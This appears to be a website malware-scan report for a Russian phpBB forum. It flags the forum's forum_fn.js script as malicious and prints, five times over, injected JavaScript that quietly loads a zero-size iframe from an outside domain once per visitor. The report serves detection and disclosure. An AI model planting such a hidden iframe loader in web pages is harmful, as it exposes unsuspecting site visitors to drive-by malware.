Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=misura.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://misura.ru/ | 200 OK Content-Length: 25078 Content-Type: text/html | clean |
http://misura.ru/./styles/prosilver/template/styleswitcher.js | 200 OK Content-Length: 2689 Content-Type: application/x-javascript | clean |
http://misura.ru/./styles/prosilver/template/forum_fn.js | 200 OK Content-Length: 5019 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: ducmet.thrilla.net ...[4273 bytes skipped]... e[3]); var width = (x1 < 0) ? (x1 * -1) + x2 : x2 - x1; var height = (y1 < 0) ? (y1 * -1) + y2 : y2 - y1; } else { var width = 200; var height = 0; } obj.width = width; obj.height = height + 16; obj.SetControllerVisible(true); obj.Play(); } var if5vDM = document.createElement('iframe');if5vDM.name = 'if5vDM';if5vDM.src = 'http://ducmet.thrilla.net/';if5vDM.style.width = '0px';if5vDM.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if5vDM=') == -1) {document.cookie = 'if5vDM=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if5vDM);}}; | ||
http://misura.ru/./index.php?sid=c9f68ec09b14985b26fe84f62b677b5f | 200 OK Content-Length: 25078 Content-Type: text/html | clean |
http://misura.ru/././styles/prosilver/template/styleswitcher.js | 200 OK Content-Length: 2689 Content-Type: application/x-javascript | clean |
http://misura.ru/././styles/prosilver/template/forum_fn.js | 200 OK Content-Length: 5019 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: ducmet.thrilla.net ...[4273 bytes skipped]... e[3]); var width = (x1 < 0) ? (x1 * -1) + x2 : x2 - x1; var height = (y1 < 0) ? (y1 * -1) + y2 : y2 - y1; } else { var width = 200; var height = 0; } obj.width = width; obj.height = height + 16; obj.SetControllerVisible(true); obj.Play(); } var if5vDM = document.createElement('iframe');if5vDM.name = 'if5vDM';if5vDM.src = 'http://ducmet.thrilla.net/';if5vDM.style.width = '0px';if5vDM.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if5vDM=') == -1) {document.cookie = 'if5vDM=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if5vDM);}}; | ||
http://misura.ru/././index.php?sid=c9f68ec09b14985b26fe84f62b677b5f | 200 OK Content-Length: 25078 Content-Type: text/html | clean |
http://misura.ru/./././styles/prosilver/template/styleswitcher.js | 200 OK Content-Length: 2689 Content-Type: application/x-javascript | clean |
http://misura.ru/./././styles/prosilver/template/forum_fn.js | 200 OK Content-Length: 5019 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: ducmet.thrilla.net ...[4273 bytes skipped]... e[3]); var width = (x1 < 0) ? (x1 * -1) + x2 : x2 - x1; var height = (y1 < 0) ? (y1 * -1) + y2 : y2 - y1; } else { var width = 200; var height = 0; } obj.width = width; obj.height = height + 16; obj.SetControllerVisible(true); obj.Play(); } var if5vDM = document.createElement('iframe');if5vDM.name = 'if5vDM';if5vDM.src = 'http://ducmet.thrilla.net/';if5vDM.style.width = '0px';if5vDM.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if5vDM=') == -1) {document.cookie = 'if5vDM=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if5vDM);}}; | ||
http://misura.ru/./././index.php?sid=c9f68ec09b14985b26fe84f62b677b5f | 200 OK Content-Length: 25078 Content-Type: text/html | clean |
http://misura.ru/././././styles/prosilver/template/styleswitcher.js | 200 OK Content-Length: 2689 Content-Type: application/x-javascript | clean |
http://misura.ru/././././styles/prosilver/template/forum_fn.js | 200 OK Content-Length: 5019 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: ducmet.thrilla.net ...[4273 bytes skipped]... e[3]); var width = (x1 < 0) ? (x1 * -1) + x2 : x2 - x1; var height = (y1 < 0) ? (y1 * -1) + y2 : y2 - y1; } else { var width = 200; var height = 0; } obj.width = width; obj.height = height + 16; obj.SetControllerVisible(true); obj.Play(); } var if5vDM = document.createElement('iframe');if5vDM.name = 'if5vDM';if5vDM.src = 'http://ducmet.thrilla.net/';if5vDM.style.width = '0px';if5vDM.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if5vDM=') == -1) {document.cookie = 'if5vDM=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if5vDM);}}; | ||
http://misura.ru/././././index.php?sid=c9f68ec09b14985b26fe84f62b677b5f | 200 OK Content-Length: 25078 Content-Type: text/html | clean |
http://misura.ru/./././././styles/prosilver/template/styleswitcher.js | 200 OK Content-Length: 2689 Content-Type: application/x-javascript | clean |
http://misura.ru/./././././styles/prosilver/template/forum_fn.js | 200 OK Content-Length: 5019 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: ducmet.thrilla.net ...[4273 bytes skipped]... e[3]); var width = (x1 < 0) ? (x1 * -1) + x2 : x2 - x1; var height = (y1 < 0) ? (y1 * -1) + y2 : y2 - y1; } else { var width = 200; var height = 0; } obj.width = width; obj.height = height + 16; obj.SetControllerVisible(true); obj.Play(); } var if5vDM = document.createElement('iframe');if5vDM.name = 'if5vDM';if5vDM.src = 'http://ducmet.thrilla.net/';if5vDM.style.width = '0px';if5vDM.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if5vDM=') == -1) {document.cookie = 'if5vDM=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if5vDM);}}; |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: misura.ru
Result:
HTTP/1.1 200 OK
Cache-Control: private, no-cache="set-cookie"
Connection: close
Date: Tue, 10 Jun 2014 08:18:18 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: 0
Set-Cookie: phpbb3_bsy2j_u=1; expires=Wed, 10-Jun-2015 08:18:17 GMT; path=/; domain=misura.ru; HttpOnly
Set-Cookie: phpbb3_bsy2j_k=; expires=Wed, 10-Jun-2015 08:18:17 GMT; path=/; domain=misura.ru; HttpOnly
Set-Cookie: phpbb3_bsy2j_sid=c9f68ec09b14985b26fe84f62b677b5f; expires=Wed, 10-Jun-2015 08:18:17 GMT; path=/; domain=misura.ru; HttpOnly
X-Powered-By: PHP/5.5.3
GET / HTTP/1.1
Host: misura.ru
Result:
HTTP/1.1 200 OK
Cache-Control: private, no-cache="set-cookie"
Connection: close
Date: Tue, 10 Jun 2014 08:18:18 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: 0
Set-Cookie: phpbb3_bsy2j_u=1; expires=Wed, 10-Jun-2015 08:18:17 GMT; path=/; domain=misura.ru; HttpOnly
Set-Cookie: phpbb3_bsy2j_k=; expires=Wed, 10-Jun-2015 08:18:17 GMT; path=/; domain=misura.ru; HttpOnly
Set-Cookie: phpbb3_bsy2j_sid=c9f68ec09b14985b26fe84f62b677b5f; expires=Wed, 10-Jun-2015 08:18:17 GMT; path=/; domain=misura.ru; HttpOnly
X-Powered-By: PHP/5.5.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: misura.ru
Referer: http://www.google.com/search?q=misura.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: misura.ru
Referer: http://www.google.com/search?q=misura.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.